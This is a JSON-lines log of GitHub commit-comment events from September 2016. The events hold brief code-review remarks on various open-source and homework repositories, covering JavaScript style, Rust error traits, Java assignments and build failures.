{"id":"4573133051","type":"CommitCommentEvent","actor":{"login":"mrshu"},"repo":{"name":"Robotics-DAI-FMFI-UK/smely-zajko"},"payload":{"comment":{"id":19051624,"position":14,"line":46,"path":"robot_controll/EvalDirection.h","commit_id":"ce84bbc630b2ebcba08b8f10640c55ca6b00a1d6","created_at":"2016-09-16T09:51:30Z","updated_at":"2016-09-16T09:51:30Z","body":"@pavelpetrovic maybe we could use the define"}},"created_at":"2016-09-16T09:51:30Z"}
{"id":"4573134597","type":"CommitCommentEvent","actor":{"login":"jifeon"},"repo":{"name":"redco/goose-proxy-rotator"},"payload":{"comment":{"id":19051631,"position":14,"line":14,"path":"bin/proxy","commit_id":"5ee433508ab3000467c8236532c6a80436ca2dd5","created_at":"2016-09-16T09:51:52Z","updated_at":"2016-09-16T09:51:52Z","body":"shouldn't you log an error is proxies are not defined? And if they are not defined you do not need even `try`. I mean you can move `if` to top level"}},"created_at":"2016-09-16T09:51:52Z"}
{"id":"4573136693","type":"CommitCommentEvent","actor":{"login":"groxxda"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19051635,"position":null,"line":null,"path":null,"commit_id":"e43a15720d62f6640d21ed49c12a3b76a563e99e","created_at":"2016-09-16T09:52:19Z","updated_at":"2016-09-16T09:52:19Z","body":"So this was merged with `after network.target ([discussed here](https://github.com/NixOS/nixpkgs/pull/18515#issuecomment-246640922))\r\n\r\nBut please remove the firewall exception (https://github.com/NixOS/nixpkgs/issues/18603#issuecomment-247334275)\r\n\r\nCc @globin @fpletz @teh"}},"created_at":"2016-09-16T09:52:19Z"}
{"id":"4573137107","type":"CommitCommentEvent","actor":{"login":"doublemarked"},"repo":{"name":"strongloop/loopback.io"},"payload":{"comment":{"id":19051636,"position":null,"line":null,"path":null,"commit_id":"68694f6c5300351fe0cd381d9be40b4bb1a4da5b","created_at":"2016-09-16T09:52:26Z","updated_at":"2016-09-16T09:52:26Z","body":"This commit is breaking `bundle exec` :/"}},"created_at":"2016-09-16T09:52:26Z"}
{"id":"4573138343","type":"CommitCommentEvent","actor":{"login":"jifeon"},"repo":{"name":"redco/goose-proxy-rotator"},"payload":{"comment":{"id":19051638,"position":25,"line":25,"path":"bin/proxy","commit_id":"5ee433508ab3000467c8236532c6a80436ca2dd5","created_at":"2016-09-16T09:52:43Z","updated_at":"2016-09-16T09:52:43Z","body":"use named functions https://github.com/airbnb/javascript#functions--declarations"}},"created_at":"2016-09-16T09:52:43Z"}
{"id":"4573140115","type":"CommitCommentEvent","actor":{"login":"paramaggarwal"},"repo":{"name":"paramaggarwal/react-progressbar"},"payload":{"comment":{"id":19051643,"position":13,"line":8,"path":"lib/index.js","commit_id":"c1d8b035cbdf9a9b2022c110f9b8e82f9273503e","created_at":"2016-09-16T09:53:08Z","updated_at":"2016-09-16T09:53:08Z","body":"This is a generated file using `npm run build` in this project... Please help out using a PR, if possible."}},"created_at":"2016-09-16T09:53:08Z"}
{"id":"4573140222","type":"CommitCommentEvent","actor":{"login":"paramaggarwal"},"repo":{"name":"paramaggarwal/react-progressbar"},"payload":{"comment":{"id":19051644,"position":12,"line":7,"path":"lib/index.js","commit_id":"c1d8b035cbdf9a9b2022c110f9b8e82f9273503e","created_at":"2016-09-16T09:53:09Z","updated_at":"2016-09-16T09:53:09Z","body":"This is a generated file using `npm run build` in this project... Please help out using a PR, if possible."}},"created_at":"2016-09-16T09:53:09Z"}
{"id":"4573140426","type":"CommitCommentEvent","actor":{"login":"paramaggarwal"},"repo":{"name":"paramaggarwal/react-progressbar"},"payload":{"comment":{"id":19051646,"position":5,"line":3,"path":"lib/index.js","commit_id":"c1d8b035cbdf9a9b2022c110f9b8e82f9273503e","created_at":"2016-09-16T09:53:11Z","updated_at":"2016-09-16T09:53:11Z","body":"This is a generated file using `npm run build` in this project... Please help out using a PR, if possible."}},"created_at":"2016-09-16T09:53:11Z"}
{"id":"4573143500","type":"CommitCommentEvent","actor":{"login":"dross23333"},"repo":{"name":"dross23333/computationalphysics_N2014301020175"},"payload":{"comment":{"id":19051651,"position":null,"line":null,"path":null,"commit_id":"fa154fe94efc1d97cb5cc411f1fb975a55461cfa","created_at":"2016-09-16T09:53:56Z","updated_at":"2016-09-16T09:53:56Z","body":"+[Exercise 2](https://www.zybuluo.com/dewey777/note/500017)"}},"created_at":"2016-09-16T09:53:56Z"}
{"id":"4573146042","type":"CommitCommentEvent","actor":{"login":"tdroxler"},"repo":{"name":"tdroxler/sarsi"},"payload":{"comment":{"id":19051652,"position":27,"line":39,"path":"sarsi.cabal","commit_id":"84c1974ab176f54c92aac94d6b49bf1f505e2b83","created_at":"2016-09-16T09:54:32Z","updated_at":"2016-09-16T09:54:32Z","body":"nope, I had to put `>= 0.9.0.1    && < 0.9.0.2`"}},"created_at":"2016-09-16T09:54:32Z"}
{"id":"4573148619","type":"CommitCommentEvent","actor":{"login":"zhw2101024"},"repo":{"name":"metalwood/libsg"},"payload":{"comment":{"id":19051659,"position":null,"line":null,"path":null,"commit_id":"c3b8100e19a38e101bc16570346ef764e9e04a70","created_at":"2016-09-16T09:55:09Z","updated_at":"2016-09-16T09:55:09Z","body":"输出改成英语"}},"created_at":"2016-09-16T09:55:09Z"}
{"id":"4573151153","type":"CommitCommentEvent","actor":{"login":"Chronophobe"},"repo":{"name":"software-engineering-amsterdam/ST-2016-wo1-5"},"payload":{"comment":{"id":19051668,"position":33,"line":33,"path":"Week 2/ahmed/Exercise6.hs","commit_id":"6620a76cd3f38dc148c8bda6718e7fd2cf10ee3a","created_at":"2016-09-16T09:55:40Z","updated_at":"2016-09-16T09:55:40Z","body":"Any particular reason you alias `read` with `toInt`? Just using `read` would work too, right? :)"}},"created_at":"2016-09-16T09:55:40Z"}
{"id":"4573152983","type":"CommitCommentEvent","actor":{"login":"wanamr87"},"repo":{"name":"creativecommons/bootstrap-mediawiki"},"payload":{"comment":{"id":19051669,"position":null,"line":null,"path":null,"commit_id":"446b0fbf9df0320ee17decc6a638d32e9a0bbbbd","created_at":"2016-09-16T09:56:09Z","updated_at":"2016-09-16T09:56:09Z","body":"google"}},"created_at":"2016-09-16T09:56:09Z"}
{"id":"4573154722","type":"CommitCommentEvent","actor":{"login":"wanamr87"},"repo":{"name":"creativecommons/bootstrap-mediawiki"},"payload":{"comment":{"id":19051674,"position":null,"line":null,"path":null,"commit_id":"446b0fbf9df0320ee17decc6a638d32e9a0bbbbd","created_at":"2016-09-16T09:56:32Z","updated_at":"2016-09-16T09:56:32Z","body":"google"}},"created_at":"2016-09-16T09:56:32Z"}
{"id":"4573155545","type":"CommitCommentEvent","actor":{"login":"jifeon"},"repo":{"name":"redco/goose-proxy-rotator"},"payload":{"comment":{"id":19051678,"position":50,"line":50,"path":"bin/proxy","commit_id":"5ee433508ab3000467c8236532c6a80436ca2dd5","created_at":"2016-09-16T09:56:42Z","updated_at":"2016-09-16T09:56:42Z","body":"just `if (ssl)` https://github.com/airbnb/javascript#comparison--shortcuts"}},"created_at":"2016-09-16T09:56:42Z"}
{"id":"4573156875","type":"CommitCommentEvent","actor":{"login":"jifeon"},"repo":{"name":"redco/goose-proxy-rotator"},"payload":{"comment":{"id":19051681,"position":51,"line":51,"path":"bin/proxy","commit_id":"5ee433508ab3000467c8236532c6a80436ca2dd5","created_at":"2016-09-16T09:56:59Z","updated_at":"2016-09-16T09:56:59Z","body":"`ph`!?"}},"created_at":"2016-09-16T09:56:59Z"}
{"id":"4573157402","type":"CommitCommentEvent","actor":{"login":"jifeon"},"repo":{"name":"redco/goose-proxy-rotator"},"payload":{"comment":{"id":19051683,"position":51,"line":51,"path":"bin/proxy","commit_id":"5ee433508ab3000467c8236532c6a80436ca2dd5","created_at":"2016-09-16T09:57:06Z","updated_at":"2016-09-16T09:57:06Z","body":"p ))))"}},"created_at":"2016-09-16T09:57:06Z"}
{"id":"4573159791","type":"CommitCommentEvent","actor":{"login":"chrisbra"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":19051688,"position":null,"line":null,"path":null,"commit_id":"e5c5f0c66c9491aca013f30da6e4f730a7ba7db6","created_at":"2016-09-16T09:57:38Z","updated_at":"2016-09-16T09:57:38Z","body":"I think we can remove that workaround, since appveyor has upgraded to Python 2.7.12"}},"created_at":"2016-09-16T09:57:38Z"}
{"id":"4573161174","type":"CommitCommentEvent","actor":{"login":"wanamr87"},"repo":{"name":"creativecommons/bootstrap-mediawiki"},"payload":{"comment":{"id":19051691,"position":null,"line":null,"path":null,"commit_id":"446b0fbf9df0320ee17decc6a638d32e9a0bbbbd","created_at":"2016-09-16T09:57:57Z","updated_at":"2016-09-16T09:57:57Z","body":"google"}},"created_at":"2016-09-16T09:57:57Z"}
{"id":"4573161188","type":"CommitCommentEvent","actor":{"login":"wanamr87"},"repo":{"name":"creativecommons/bootstrap-mediawiki"},"payload":{"comment":{"id":19051692,"position":null,"line":null,"path":null,"commit_id":"446b0fbf9df0320ee17decc6a638d32e9a0bbbbd","created_at":"2016-09-16T09:57:57Z","updated_at":"2016-09-16T09:57:57Z","body":"google"}},"created_at":"2016-09-16T09:57:57Z"}
{"id":"4573161716","type":"CommitCommentEvent","actor":{"login":"wanamr87"},"repo":{"name":"creativecommons/bootstrap-mediawiki"},"payload":{"comment":{"id":19051693,"position":null,"line":null,"path":null,"commit_id":"446b0fbf9df0320ee17decc6a638d32e9a0bbbbd","created_at":"2016-09-16T09:58:05Z","updated_at":"2016-09-16T09:58:05Z","body":"google"}},"created_at":"2016-09-16T09:58:05Z"}
{"id":"4573162396","type":"CommitCommentEvent","actor":{"login":"chrisbra"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":19051695,"position":null,"line":null,"path":null,"commit_id":"e5c5f0c66c9491aca013f30da6e4f730a7ba7db6","created_at":"2016-09-16T09:58:14Z","updated_at":"2016-09-16T09:58:14Z","body":"see vim/vim-win32-installer#18"}},"created_at":"2016-09-16T09:58:14Z"}
{"id":"4573163280","type":"CommitCommentEvent","actor":{"login":"slashmili"},"repo":{"name":"Vagabond/erlang-syslog"},"payload":{"comment":{"id":19051698,"position":null,"line":null,"path":null,"commit_id":"e24c9ee8f7bb3f066ec152c210af10c2c712759a","created_at":"2016-09-16T09:58:26Z","updated_at":"2016-09-16T09:58:26Z","body":"@Vagabond any plan to update the package in hex?"}},"created_at":"2016-09-16T09:58:26Z"}
{"id":"4573166063","type":"CommitCommentEvent","actor":{"login":"farvardin"},"repo":{"name":"farvardin/audio"},"payload":{"comment":{"id":19051708,"position":null,"line":null,"path":null,"commit_id":"27e10f9767c9cc9a5965d20c59c201f1795ae503","created_at":"2016-09-16T09:59:02Z","updated_at":"2016-09-16T09:59:02Z","body":"j'ai rajouté des infos sur comment sauvegarder et charger les tracks\r\n+ rajout antialiasing"}},"created_at":"2016-09-16T09:59:02Z"}
{"id":"4573167385","type":"CommitCommentEvent","actor":{"login":"SammysHP"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":19051733,"position":null,"line":null,"path":null,"commit_id":"61fbe4e3ccff5becc20c505a45aaf46a5d19dc82","created_at":"2016-09-16T09:59:15Z","updated_at":"2016-09-16T09:59:15Z","body":"It might be good to include the state of the permissions in the system information."}},"created_at":"2016-09-16T09:59:15Z"}
{"id":"4573168025","type":"CommitCommentEvent","actor":{"login":"nikolai-b"},"repo":{"name":"npct/pct-shiny"},"payload":{"comment":{"id":19051738,"position":null,"line":null,"path":null,"commit_id":"b249564090bf01b583dff05ca731a8545d6fcec3","created_at":"2016-09-16T09:59:25Z","updated_at":"2016-09-16T09:59:25Z","body":"@Robinlovelace where is this used in pct-shiny?  I thought it was replaced with the js front page.  If it is used apologies for deleting, if it is not used then we shouldn't have it here."}},"created_at":"2016-09-16T09:59:25Z"}
{"id":"4573168916","type":"CommitCommentEvent","actor":{"login":"Appebyte"},"repo":{"name":"software-engineering-amsterdam/ST-2016-wo1-5"},"payload":{"comment":{"id":19051740,"position":33,"line":33,"path":"Week 2/ahmed/Exercise6.hs","commit_id":"6620a76cd3f38dc148c8bda6718e7fd2cf10ee3a","created_at":"2016-09-16T09:59:38Z","updated_at":"2016-09-16T09:59:38Z","body":"Good point :D Initially, I thought it would be harder to convert a string to an integer. So I had that function there until I realized that there was this read function.\r\nThanks for the tip!"}},"created_at":"2016-09-16T09:59:38Z"}
{"id":"4576950143","type":"CommitCommentEvent","actor":{"login":"mattiamanzati"},"repo":{"name":"ReactTraining/react-router"},"payload":{"comment":{"id":19061866,"position":null,"line":null,"path":null,"commit_id":"ab57fa8554e4d2efaeaf2dd0ab82ea6434bac5b5","created_at":"2016-09-17T00:00:42Z","updated_at":"2016-09-17T00:00:42Z","body":"The point of this PR are mostly 2:\r\n\r\n1. Link provides a set of shenenigans to handle dom links correctly. \r\nhttps://github.com/ReactTraining/react-router/blob/v4/modules/Link.js#L136-L140\r\nIt prevents altClicks, etc. If you use third party UI library like material-ui unfortunately you can't simply wrap the component they give onto a link. Their component behaves like a link, and in fact pass all the props to a link, but you can't wrap it (it will generate a double link).\r\n\r\nFunction as children provides a way to tell react-router to prepare all those props, and eventually say: \"Ok, now don't render the <a/>; another library will take care of that. Just give me the props.\r\n\r\n```js\r\n// define the react-router wrapper\r\nconst FlatButtonLink = ({to, location, ...props}) => <Link to={to} location={location}>{\r\n    ({isActive, href, onClick}) => <FlatButton {...props} onClick={onClick} href={href} primary={isActive} />\r\n}</Link>\r\n\r\n// later in your code\r\n<FlatButtonLink to=\"/users/add\" />\r\n```\r\n2. ReactNative handling comed in automatically from that API. As you pointed out, that could also be achived with more lines of code by wrapping Match; I saw the comment on the code and thought that `cons isActive` will eventually be replaced by a `<Match/>`"}},"created_at":"2016-09-17T00:00:42Z"}
{"id":"4576951301","type":"CommitCommentEvent","actor":{"login":"Oleiva"},"repo":{"name":"art07/RepositoryGoIT"},"payload":{"comment":{"id":19061869,"position":26,"line":26,"path":"GoIT_Project_1/src/module_5_homework/Controller.java","commit_id":"ab450d450535d429b69283ce9a2fa60c24196a6b","created_at":"2016-09-17T00:01:11Z","updated_at":"2016-09-17T00:01:11Z","body":"Ты получаешь в каждом методе массивы из комнат и все что нужно, это сложить три массива в результирующий. Возвращаешь не null, а массив комнат  класса Room"}},"created_at":"2016-09-17T00:01:11Z"}
{"id":"4576952850","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"github/elasticsearch-srv-discovery"},"payload":{"comment":{"id":19061875,"position":null,"line":null,"path":null,"commit_id":"7ec03634259d3f79a087a71e23c3cf1273d5e104","created_at":"2016-09-17T00:01:52Z","updated_at":"2016-09-17T00:01:52Z","body":"7ec0363"}},"created_at":"2016-09-17T00:01:52Z"}
{"id":"4576956286","type":"CommitCommentEvent","actor":{"login":"nekrozar"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19061879,"position":11,"line":51,"path":"scripts/YA02-JP/c100211001.lua","commit_id":"feb0b02377ef621c1372e40a344bfd154a9aa210","created_at":"2016-09-17T00:02:57Z","updated_at":"2016-09-17T00:02:57Z","body":"> the level of the non tuner has to be 7-tuner level, not equal to the tuner level\r\n\r\nSorry I mistook.\r\nhttps://github.com/Fluorohydride/ygopro-pre-script/commit/8474647dd64a9c0c7fe204bfc9246bb6349a717c fixed.\r\n\r\n> also, I left out the trapmonster part on purpose, there is non and I don't think there will ever be a trapmonster that is special summoned from the extra deck^^\r\n\r\nhttps://github.com/Fluorohydride/ygopro-scripts/blob/master/c99185129.lua#L91"}},"created_at":"2016-09-17T00:02:57Z"}
{"id":"4576956957","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/homework-city"},"payload":{"comment":{"id":19061880,"position":4,"line":16,"path":"week_06_assn/js/index.js","commit_id":"01f9d09b16fafafdde6f98c6e74764580da61914","created_at":"2016-09-17T00:03:14Z","updated_at":"2016-09-17T00:03:14Z","body":"Glad you asked!  \r\nChanging the line to the following should do the trick.  \r\n\r\n```\r\n$(\"select\").append(\"<option>\"+city[index]+\"</option>\");\r\n```\r\n\r\nIn a \"for\" loop, we need to explicitly retrieve the value of a particular array item, so we target the \"city\" array, and access the array index with the current value of the \"index\" variable. \r\nThe first time, we would ask for the value in city[0], the second time through, city[1] etc...\r\n\r\nIn a \"forEach\" loop, we don't need to retrieve it directly, we have the \"element\" item available to us just by using the \"forEach\" method.  Behind the scenes, the \"forEach\" method is retrieving the value from the array, like we do in the \"for\" loop.  \r\n\r\nThat help?"}},"created_at":"2016-09-17T00:03:14Z"}
{"id":"4576958092","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19061883,"position":null,"line":null,"path":null,"commit_id":"7440a10dea02a9331ad457fed8bbec30fd4df8a2","created_at":"2016-09-17T00:03:43Z","updated_at":"2016-09-17T00:03:43Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-MacOS-10.9-clang: Tests Failed (1761 of 2331 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7440a10dea02a9331ad457fed8bbec30fd4df8a2-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7440a10dea02a9331ad457fed8bbec30fd4df8a2-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.55%25-red.svg)</a> \n"}},"created_at":"2016-09-17T00:03:43Z"}
{"id":"4576960768","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/homework-city"},"payload":{"comment":{"id":19061889,"position":7,"line":7,"path":"week_06_assn/js/index.js","commit_id":"42e85b9b9b9788db8991fb07bc67ae61126e48cf","created_at":"2016-09-17T00:04:52Z","updated_at":"2016-09-17T00:04:52Z","body":"nice work with the array and all of your comments!"}},"created_at":"2016-09-17T00:04:52Z"}
{"id":"4576963476","type":"CommitCommentEvent","actor":{"login":"mattiamanzati"},"repo":{"name":"ReactTraining/react-router"},"payload":{"comment":{"id":19061897,"position":null,"line":null,"path":null,"commit_id":"ab57fa8554e4d2efaeaf2dd0ab82ea6434bac5b5","created_at":"2016-09-17T00:06:01Z","updated_at":"2016-09-17T00:06:01Z","body":"P.S. Maybe we should revive #3874 and discuss there ;)"}},"created_at":"2016-09-17T00:06:01Z"}
{"id":"4576963673","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"nabijaczleweli/termimage"},"payload":{"comment":{"id":19061898,"position":13,"line":13,"path":"src/error.rs","commit_id":"991a55513867335836ee479cf2a7bc3f36ad8676","created_at":"2016-09-17T00:06:08Z","updated_at":"2016-09-17T00:06:08Z","body":"`termimage::Error` doesn't (and can't, because borrows) behave like a `std::error::Error`, it was renamed because of [this roddit comment](https://www.reddit.com/r/rust/comments/532u9u/termimage_display_images_in_your_terminal_as_best/d7pvboa)"}},"created_at":"2016-09-17T00:06:08Z"}
{"id":"4576966721","type":"CommitCommentEvent","actor":{"login":"retrobenny"},"repo":{"name":"mupen64plus-ae/mupen64plus-ae"},"payload":{"comment":{"id":19061922,"position":null,"line":null,"path":null,"commit_id":"bbdc3c5e8eaaeb1dd7b29c809b6ab1aeabb1d3a1","created_at":"2016-09-17T00:07:28Z","updated_at":"2016-09-17T00:07:28Z","body":"Code belongs to Isotarge.\r\nI then found a nearby byte that also works with the same conditions.\r\n\r\nAlternate Fix\r\n80619632 0000\r\nWorks the same as the original but with only one \"8bits\" line."}},"created_at":"2016-09-17T00:07:28Z"}
{"id":"4576969762","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/homework-city"},"payload":{"comment":{"id":19061929,"position":10,"line":10,"path":"week_06_assn/js/index.js","commit_id":"42e85b9b9b9788db8991fb07bc67ae61126e48cf","created_at":"2016-09-17T00:08:56Z","updated_at":"2016-09-17T00:08:56Z","body":"Nice work here..taking it one step further, you could say \r\n`\r\nfor (index = 0; index < city.length; ++index) {\r\n`\r\n\r\ncity.length will return the number of items in the array, which would be a more scalable way to get \"5\".  Then, if you add an item to the array, it will automatically update your loop to loop through one more time than it did with 5 items.  "}},"created_at":"2016-09-17T00:08:56Z"}
{"id":"4576970497","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/homework-city"},"payload":{"comment":{"id":19061930,"position":19,"line":19,"path":"week_06_assn/js/index.js","commit_id":"42e85b9b9b9788db8991fb07bc67ae61126e48cf","created_at":"2016-09-17T00:09:15Z","updated_at":"2016-09-17T00:09:15Z","body":"Great work using the .change() method and invoking another function! 👍 "}},"created_at":"2016-09-17T00:09:15Z"}
{"id":"4576971339","type":"CommitCommentEvent","actor":{"login":"FroMage"},"repo":{"name":"ceylon/ceylon-lang.org"},"payload":{"comment":{"id":19061932,"position":24,"line":0,"path":"blog/2016-09-16-ceylon-1-3-0.md","commit_id":"c25de04b675e13bafb136a8591894c3c1d5b01ae","created_at":"2016-09-17T00:09:37Z","updated_at":"2016-09-17T00:09:37Z","body":"Localhost"}},"created_at":"2016-09-17T00:09:37Z"}
{"id":"4576976172","type":"CommitCommentEvent","actor":{"login":"kenaniah"},"repo":{"name":"kenaniah/chrome-navigation-plugin"},"payload":{"comment":{"id":19061941,"position":null,"line":null,"path":null,"commit_id":"9337c503a48ef11538b0e5fcef20ae49ca52ece5","created_at":"2016-09-17T00:11:51Z","updated_at":"2016-09-17T00:11:51Z","body":"Niclas,\n\nI've pushed the update (version 8.3) to the App Store that should fix the\nCSS issue. Please let me know if you're still having issues.\n\nThanks,\n\nKenaniah\n\nOn Friday, September 16, 2016, Niclas Darville <notifications@github.com>\nwrote:\n\n> When is this being pushed to the app store? Leaving the extension disabled\n> for now. :)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/kenaniah/chrome-navigation-plugin/commit/9337c503a48ef11538b0e5fcef20ae49ca52ece5#commitcomment-19061587>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAWNGI1_JON3txtB-eP9X5xpnV8VjIQMks5qqyS1gaJpZM4J_bl8>\n> .\n>\n"}},"created_at":"2016-09-17T00:11:51Z"}
{"id":"4576977642","type":"CommitCommentEvent","actor":{"login":"dpc"},"repo":{"name":"nabijaczleweli/termimage"},"payload":{"comment":{"id":19061944,"position":13,"line":13,"path":"src/error.rs","commit_id":"991a55513867335836ee479cf2a7bc3f36ad8676","created_at":"2016-09-17T00:12:34Z","updated_at":"2016-09-17T00:12:34Z","body":"What borrows? the `enum Error` above does not borrow anything, so I see no reason why it couldn't implement `Error` trait."}},"created_at":"2016-09-17T00:12:34Z"}
{"id":"4576979640","type":"CommitCommentEvent","actor":{"login":"Oleiva"},"repo":{"name":"art07/RepositoryGoIT"},"payload":{"comment":{"id":19061948,"position":20,"line":20,"path":"GoIT_Project_1/src/module_5_homework/Main.java","commit_id":"ab450d450535d429b69283ce9a2fa60c24196a6b","created_at":"2016-09-17T00:13:32Z","updated_at":"2016-09-17T00:13:32Z","body":"Соответственно System.out.println(daoImpl.findById(1)); тоже работать не будет."}},"created_at":"2016-09-17T00:13:32Z"}
{"id":"4576980512","type":"CommitCommentEvent","actor":{"login":"AirwavesMan"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19061954,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-17T00:13:58Z","updated_at":"2016-09-17T00:13:58Z","body":"I already tied building some stuff. Metalfloors, buildings, stones, changed the debug to mainland, changed the coords not in or over water. It is really weird. The player swims because the debug is in water but when the debug is not in water the player also swims.\r\nIt we can get a combination of both fixes it would be great. The only thing on the first fix is, that the player stands up everytime but I would fine be with that. "}},"created_at":"2016-09-17T00:13:58Z"}
{"id":"4576980767","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"nabijaczleweli/termimage"},"payload":{"comment":{"id":19061957,"position":13,"line":13,"path":"src/error.rs","commit_id":"991a55513867335836ee479cf2a7bc3f36ad8676","created_at":"2016-09-17T00:14:06Z","updated_at":"2016-09-17T00:14:06Z","body":"`std::Error::description()` returns a borrowed string, which we do not have (we only create result strings in `print_error()`)"}},"created_at":"2016-09-17T00:14:06Z"}
{"id":"4576986818","type":"CommitCommentEvent","actor":{"login":"ashi2014"},"repo":{"name":"ashi2014/test-repo"},"payload":{"comment":{"id":19061975,"position":2,"line":6,"path":"README.md","commit_id":"0264540d99771a07ee794b1d245b1d64fbbf19bc","created_at":"2016-09-17T00:17:03Z","updated_at":"2016-09-17T00:17:03Z","body":"fgdfgdfg"}},"created_at":"2016-09-17T00:17:03Z"}
{"id":"4576989473","type":"CommitCommentEvent","actor":{"login":"dpc"},"repo":{"name":"nabijaczleweli/termimage"},"payload":{"comment":{"id":19061982,"position":13,"line":13,"path":"src/error.rs","commit_id":"991a55513867335836ee479cf2a7bc3f36ad8676","created_at":"2016-09-17T00:18:16Z","updated_at":"2016-09-17T00:18:16Z","body":"Each enum variant does store a `String`. You could write the formatted string there and return & to it. Some form of protection over multiple calls to `description` (either a flag, or just checking if the string is not already formatted)?\r\n\r\nActually I'd just format the `String` in both variants upfront in a constructor and return that."}},"created_at":"2016-09-17T00:18:16Z"}
{"id":"4576990759","type":"CommitCommentEvent","actor":{"login":"Oleiva"},"repo":{"name":"art07/RepositoryGoIT"},"payload":{"comment":{"id":19061991,"position":43,"line":43,"path":"GoIT_Project_1/src/module_5_homework/Controller.java","commit_id":"ab450d450535d429b69283ce9a2fa60c24196a6b","created_at":"2016-09-17T00:18:58Z","updated_at":"2016-09-17T00:18:58Z","body":"Тут сигнатура такая Room[] check(API api1, API api2) Тут предлагают сравнить два массива комнат api1, api2, и сказать сколько между ними одинаковых комнат."}},"created_at":"2016-09-17T00:18:58Z"}
{"id":"4576991652","type":"CommitCommentEvent","actor":{"login":"bmneely"},"repo":{"name":"BrysonRafael/address-bloc"},"payload":{"comment":{"id":19061992,"position":5,"line":46,"path":"spec/address_book_spec.rb","commit_id":"f20bb7ab4e9ae41aff5e7170583395455b7f287f","created_at":"2016-09-17T00:19:24Z","updated_at":"2016-09-17T00:19:24Z","body":"This is going to doing a boolean evaluation of the two strings, which will resolve to true, and then pass `true` into `import_from_csv`"}},"created_at":"2016-09-17T00:19:24Z"}
{"id":"4576991914","type":"CommitCommentEvent","actor":{"login":"Oleiva"},"repo":{"name":"art07/RepositoryGoIT"},"payload":{"comment":{"id":19061993,"position":56,"line":56,"path":"GoIT_Project_1/src/module_5_homework/Controller.java","commit_id":"ab450d450535d429b69283ce9a2fa60c24196a6b","created_at":"2016-09-17T00:19:32Z","updated_at":"2016-09-17T00:19:32Z","body":"ответом будет число дубликатов между api1, api2"}},"created_at":"2016-09-17T00:19:32Z"}
{"id":"4576992106","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"amy-b/homework-city"},"payload":{"comment":{"id":19061994,"position":4,"line":4,"path":"Assignment 6/starter_code/js/index.js","commit_id":"3d68ca25793bf943a403cb9e347c54ab07115565","created_at":"2016-09-17T00:19:38Z","updated_at":"2016-09-17T00:19:38Z","body":"Great to see so many comments in here!"}},"created_at":"2016-09-17T00:19:38Z"}
{"id":"4576993317","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"amy-b/homework-city"},"payload":{"comment":{"id":19061995,"position":6,"line":6,"path":"Assignment 6/starter_code/js/index.js","commit_id":"3d68ca25793bf943a403cb9e347c54ab07115565","created_at":"2016-09-17T00:20:12Z","updated_at":"2016-09-17T00:20:12Z","body":"Looks like this jQuery snippet isn't necessary as you are retrieving the current value of the class attribute, but not using it"}},"created_at":"2016-09-17T00:20:12Z"}
{"id":"4576993629","type":"CommitCommentEvent","actor":{"login":"bmneely"},"repo":{"name":"BrysonRafael/address-bloc"},"payload":{"comment":{"id":19061999,"position":5,"line":46,"path":"spec/address_book_spec.rb","commit_id":"f20bb7ab4e9ae41aff5e7170583395455b7f287f","created_at":"2016-09-17T00:20:20Z","updated_at":"2016-09-17T00:20:20Z","body":"The tests for entries_2.csv should be separate, because your reading sequentially from two different files, not from two at the same time."}},"created_at":"2016-09-17T00:20:20Z"}
{"id":"4576993969","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"amy-b/homework-city"},"payload":{"comment":{"id":19062001,"position":8,"line":8,"path":"Assignment 6/starter_code/js/index.js","commit_id":"3d68ca25793bf943a403cb9e347c54ab07115565","created_at":"2016-09-17T00:20:30Z","updated_at":"2016-09-17T00:20:30Z","body":"💯  Great work with the array and loop!"}},"created_at":"2016-09-17T00:20:30Z"}
{"id":"4576995360","type":"CommitCommentEvent","actor":{"login":"lollipoll"},"repo":{"name":"dscotthunter/Fantasy-Hockey-IP-Code"},"payload":{"comment":{"id":19062006,"position":null,"line":null,"path":null,"commit_id":"673b0a5119ed746a8dc2347206d138c84407def1","created_at":"2016-09-17T00:21:10Z","updated_at":"2016-09-17T00:21:10Z","body":"I, too, tried the Github code. I'm much more of a mathematician than a programmer, and I can't get it to work! I updated the paths but when I open the code in Julia, no changes are made to my output.csv. Am I doing something stupid?"}},"created_at":"2016-09-17T00:21:10Z"}
{"id":"4576997822","type":"CommitCommentEvent","actor":{"login":"julienledem"},"repo":{"name":"pcmoritz/arrow"},"payload":{"comment":{"id":19062013,"position":6,"line":19,"path":"format/Message.fbs","commit_id":"0707062979e99e136656bf7ebfda7f4eb722b5ce","created_at":"2016-09-17T00:22:20Z","updated_at":"2016-09-17T00:22:20Z","body":"the Utf8 type is what you want?"}},"created_at":"2016-09-17T00:22:20Z"}
